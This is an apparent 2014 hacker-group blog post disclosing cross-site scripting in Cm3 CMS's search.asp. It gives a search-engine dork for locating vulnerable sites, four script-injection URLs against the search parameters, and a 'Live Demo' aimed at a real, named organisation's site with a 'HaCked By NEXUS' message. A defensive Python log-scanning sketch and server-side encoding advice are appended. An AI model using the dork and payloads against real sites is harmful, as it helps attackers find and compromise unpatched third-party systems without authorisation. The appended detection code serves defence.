Tuesday, 1 July 2014

Cm3 CMS Cross Site Scripting (XSS)

Dork:
intext:"Powered by cm3"
* The Keywords and strSearchPhrase parameters in search.asp are vulnerable to XSS.

Exploits:
http://www.NEXUS.com/forums/search.asp?strSearchPhrase="><script>alert(0);</script>&ContainerID=&forumsearchoption=topics
http://www.NEXUS.com/search.asp?keywords="><script>alert(0);</script>&SearchType=And&CurrentPage=1
http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&SearchType=Default
http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&x=0&y=0

Live Demo:
http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&amp;ContainerID=&forumsearchoption=topics 

NEXUS
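
A detection sketch for the parameters listed above, added here as an example and not part of the original post: it flags requests to search.asp whose strSearchPhrase, keywords or sitekeywords field decodes to HTML-breaking characters, including double-encoded values and the form where the markup sits in the field name. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters the advisory's URLs target on search.asp (matched case-insensitively).
WATCHED = ("strsearchphrase", "sitekeywords", "keywords")
# Characters that let input close an HTML attribute and open a new tag.
MARKUP = re.compile(r'["<>]')
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2014:10:00:01 +0000] "GET /search.asp?keywords=chairs&SearchType=And&CurrentPage=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jul/2014:10:02:14 +0000] "GET /forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%3E&ContainerID=&forumsearchoption=topics HTTP/1.1" 200 6011',
    '203.0.113.9 - - [01/Jul/2014:10:02:30 +0000] "GET /search.asp?CurrentPage=1&sitekeywords%22%3E%3Cscript%3Ealert(0)%3B%3C/script%3E&SearchType=Default HTTP/1.1" 200 5987',
    '203.0.113.9 - - [01/Jul/2014:10:03:02 +0000] "GET /search.asp?SearchType=Keywords&Keywords=%2522%253E%253Cscript%253E&x=0&y=0 HTTP/1.1" 200 5990',
]

def fully_decode(text, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def suspicious_params(request_target):
    """Return sorted watched parameters whose name or value carries markup."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/search.asp"):
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        name, value = fully_decode(name), fully_decode(value)
        # A missing "=" leaves the payload in the name, so match on its prefix.
        watched = next((w for w in WATCHED if name.lower().startswith(w)), None)
        if watched and MARKUP.search(name + value):
            hits.add(watched)
    return sorted(hits)

def scan(lines):
    """Return (line_number, parameters) for each log line that is flagged."""
    results = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            results.append((number, hits))
    return results
```

The durable fix is on the server side: HTML-encode these values before search.asp writes them back into the page. Log matching like this only shows where the parameters are being probed.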